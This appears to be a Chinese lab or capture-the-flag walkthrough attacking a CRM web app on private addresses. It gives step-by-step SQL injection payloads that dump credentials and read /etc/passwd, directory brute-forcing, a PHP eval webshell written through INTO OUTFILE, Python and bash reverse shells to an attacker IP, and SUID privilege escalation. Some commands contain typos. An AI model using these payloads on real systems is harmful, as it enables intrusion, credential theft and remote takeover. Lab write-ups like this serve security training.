1.尝试注入,未报错
2.查询有几个字段数
命令:1′ ORDER BY 4–+
尝试发现3未报错,4会报错,可以推断一共有三个字段。
3.显示当前数据库名
命令:1′ UNION SELECT 1,2,3, 1′ UNION SELECT 1,database(),3,
使用联合查询查询用database()显示当前数据库名yxcrm
4.显示yxcrm库里所有表名
命令:1′ UNION SELECT 1,table_name,3 FROM information_schema.tables WHERE table_schema=’yxcrm’ — 
可以发现有两张表,使用table表名,如果显示不全可以加group_concat
5.显示users表里所有字段名
命令:1′ UNION SELECT 1,column_name,3 FROM information_schema.columns WHERE table_name=’users’–
可以发现有4个字段,使用column字段名,如果显示不全可以加group_concat
6.显示内容
0′ OULON SELECT 1,concat(id,”=”,usemame,”=”,password,”=”,role),3 From users–
查询出管理员密码登录它,我使用了concat来进行拼接,0′ UNION SELECT 1,username,3 FROM users– + 也可以这样一个个查询
7,查询passwd,shadow文件内容
命令:1′ union select 1,load_file(‘/etc/passwd’),3–
使用函数load_file读取passwd,shawod。 只有passwd可以查询,同时发现除了root以外还一个labadmin(好像没什么用)
8.爆破目录
命令:根目录gobuster dir -u http://10.10.1.40 -w /usr/share/wordlists/dirb/common.txt -x php,txt,inc,bak,sql -t 50 -o inodes-ext-scan.txt
可以发现几个301的目录 挨个爆破接着试/assets/ /includes/ /uploads/
命令:gobuster dir -u http://10.10.1.40/includes -w /usr/share/wordlists/dirb/common.txt -x php,txt,inc,bak,sql -t 50 -o inodes-ext-scan.txt
只有includes 里面发现了有价值的文件db.php layout.php
9.查看这两个文件
命令:1′ union select 1,load_file(‘/var/www/html/includes/db.php’),3–
在文件db,php里有一个提升可以用into outfole函数来进行写入,layout.php文件里写的CRM 系统公共头尾封装函数没什么可利用的价值
10.尝试写入一句话木马
命令:写入1′ union select 1,'<?php @eval($_POST[‘cmd’]);?>’,3 into outfile ‘/var/www/html/uploads/222.php’ —
命令:查看1′ union select 1,load_file(/var/www/html/uploads/222.php’),3 —
我这里选择的文件是uploads,写入的时候会显示报错,查看的时候是显示有这个文件的内容的
测试发现 ‘写入的文件可以爆破出来, 1’的文件不能爆破出来。推测是因为 ‘文件里写入的时候有附加内容,1’写入只有一句话木马导致爆破的时候识别不了


11.进行反弹连接
命令kali一:nc -lvn 4444
命令kali二:curl -X POST http://10.10.1.40/uploads/222.php -d “cmd=system(‘python3 -c \”import socket,os,pty;s=socket.socket();s.connect((\\\”172.16.13.65\\\”,4444));[os.dup2(s.fileno(),f) for f in (0,1,2)];pty.spawn(\\\”/bin/sh\\\”)\”‘);”
12.查看suid权限文件
- pwd—-查看当前文件路径
- find/ -perm -u+s -type -ls 2>/dev/null
13.提权
命令:/usr/local/bin/sysbash -p
多次尝试 发现要加-p
14.额外内容
木马<?php echo exec($_POST[“cmd”]); ?>
连接命令curl -X POST http://10.10.1.40/uploads/cmd.php -d “cmd=bash -c ‘bash -i >%26 /dev/tcp/172.16.13.65/4444 0>%261′”











评论(0)
暂无评论